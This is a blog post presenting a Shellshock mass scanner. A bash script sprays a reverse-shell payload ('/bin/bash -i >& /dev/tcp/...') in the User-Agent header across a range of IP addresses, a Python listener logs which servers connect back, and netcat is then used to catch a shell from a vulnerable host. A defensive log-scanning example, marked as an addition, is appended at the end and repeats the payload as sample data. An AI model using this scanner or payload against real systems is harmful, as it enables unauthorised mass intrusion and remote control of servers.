BashShock HTTP Scanner

 ·  🎃 kr0m

As discussed in the previous article, the bash shock bug can be exploited on web servers when the PHP interpreter is executed through a wrapper written in bash. Before that, however, such servers have to be located. This time we use exactly the same technique as in the previous article, but instead of leaving a netcat listening to collect the connection, we leave a Python script listening that prints which IPs try to connect back. We therefore end up with one script that attempts to trigger the vulnerability across a range and another that shows where it actually executed.

The script that we will put on listening is:

vi python_server_socket.py

# Python 2 syntax: run with python2.7, as the scanner banner says.
import socket

s = socket.socket()
print "-- Socket successfully created"
port = 4141
s.bind(('', port))  # listen on all interfaces
print "-- Socket binded to %s" %(port)
s.listen(5)
print "-- Socket is listening"
while True:
    # Accept the incoming connection, print the peer address and drop it.
    c, addr = s.accept()
    print '-- Got connection from', addr
    c.close()
    print '-- Connection closed'

NOTE: This script listens on port 4141. Whenever something connects to that port, it prints the source IP and closes the connection.

The bug checking script is as follows:

#!/bin/bash
clear
echo -e "-----------------------------------------------"
echo -e "| BashShock HTTP Scanner v0.1b, coded by Kr0m |"
echo -e "-----------------------------------------------"
echo -e "++ Remember to put the listening script in the configured port"
echo -e "  python2.7 python_server_socket.py "
echo -e " "

if [ $# -ne 2 ]; then
        echo -e "-- Invalid number of arguments."
        echo -e "bashshock_http_scanner.sh FIRST_IP LAST_IP"
        echo -e " "
        exit 1
fi

HOST="192.168.20.1"
PORT="4141"

IP="$1"
IP2="$2"

STAT=1
STAT2=1

# Dots must be escaped, otherwise "." matches any character.
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
        OIFS=$IFS
        IFS='.'
        IP=($IP)
        IFS=$OIFS
        [[ ${IP[0]} -le 255 && ${IP[1]} -le 255 && ${IP[2]} -le 255 && ${IP[3]} -le 255 ]]
        STAT=$?
fi

if [ $STAT == '1' ]; then
        echo -e "-- First IP: $1 -- INVALID, aborting"
        exit 1
else
        echo -e "-- First IP: $1 -- VALID"
fi

if [[ $IP2 =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
        OIFS=$IFS
        IFS='.'
        IP2=($IP2)
        IFS=$OIFS
        [[ ${IP2[0]} -le 255 && ${IP2[1]} -le 255 && ${IP2[2]} -le 255 && ${IP2[3]} -le 255 ]]
        STAT2=$?
fi

if [ $STAT2 == '1' ]; then
        echo -e "-- Second IP: $2 -- INVALID, aborting"
        exit 1
else
        echo -e "-- Second IP: $2 -- VALID"
fi

# Convert both dotted-quad addresses to 32-bit integers so the range can be iterated.
IFS=. read -r a b c d <<< "$1"
INT=$(printf '%d\n' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))")

IFS=. read -r a b c d <<< "$2"
INT2=$(printf '%d\n' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))")

#echo -e "-- INT: $INT"
#echo -e "-- INT2: $INT2"

if [ "$INT2" -ge "$INT" ]; then
        echo -e "-- Valid IP Range"
else
        echo -e "-- Invalid IP Range, aborting"
        exit 1
fi

echo -e " "

while [ $INT -le $INT2 ]; do
        A=$(echo -n $(($(($(($((${INT}/256))/256))/256))%256)).)
        B=$(echo -n $(($(($((${INT}/256))/256))%256)).)
        C=$(echo -n $(($((${INT}/256))%256)).)
        D=$(echo $((${INT}%256)))
        echo -e "=============================================================="
        echo -e "++ Scanning IP: $A$B$C$D"
        curl -m 6 -k -H 'User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/'$HOST'/'$PORT' 0>&1' http://$A$B$C$D/ -s -o /dev/null &
        let INT=$INT+1
done
echo -e "=============================================================="

If the scanner hits a vulnerable server, the console running the Python listener will show something like this:

-- Socket successfully created
-- Socket binded to 4141
-- Socket is listening
-- Got connection from ('192.168.20.27', 60223)
-- Connection closed

This shows that the server 192.168.20.27 is vulnerable to this attack; now we simply rerun the attack from the previous article and we have a shell ;)

We put netcat on listening mode:

nc -l -p 8080

We exploit the vulnerability:

python2.7 bashshoc.py 192.168.20.27 /index.php 192.168.20.1/8080

In the shell with netcat, we receive the remote shell:

nc -l -p 8080
web_prueba@RX3 /var/www/bin/web_pruebas $

This script only works if the server's index file is interpreted through the wrapper. It may well be that the index is a plain HTML file while other parts of the site are written in PHP, for example, in which case the scan of "/" shows nothing even though the server is affected.
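From the defensive side, the same pattern the scanner plants in the User-Agent header is what a web-server log should be checked for. The following is an added example, not part of the original post or the author's scripts: a Python 3 check that scans access-log lines (assumed to be in Apache/nginx combined format) for the bash function-definition prefix in the request line, Referer or User-Agent. The log lines are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.168.20.1 - - [10/Oct/2014:12:00:01 +0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -i >& /dev/tcp/192.168.20.1/4141 0>&1"
192.168.20.55 - - [10/Oct/2014:12:00:02 +0200] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.20.1 - - [10/Oct/2014:12:00:03 +0200] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "() { :; }; echo vulnerable" "curl/7.38.0"
"""

# A vulnerable bash parses any environment variable whose value starts with "() {"
# as a function definition. Matching that prefix (whitespace tolerant) is enough
# to flag an attempt, regardless of the command that follows it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one record per log line carrying the Shellshock prefix in any
    attacker-controlled field that the web server copies into the environment."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        for field in ("ua", "referer", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "field": field,
                    "request": m.group("req"),
                    "status": m.group("status"),
                })
                break  # one record per line is enough for alerting
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("Shellshock attempt from %(ip)s in %(field)s: %(request)s (HTTP %(status)s)" % hit)
```

A hit only proves an attempt reached the server, not that it executed; the HTTP status says nothing about success, so confirm by correlating with unexpected outbound connections from the web host, which is exactly the signal the listener above relies on.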

If you liked the article, you can treat me to a RedBull here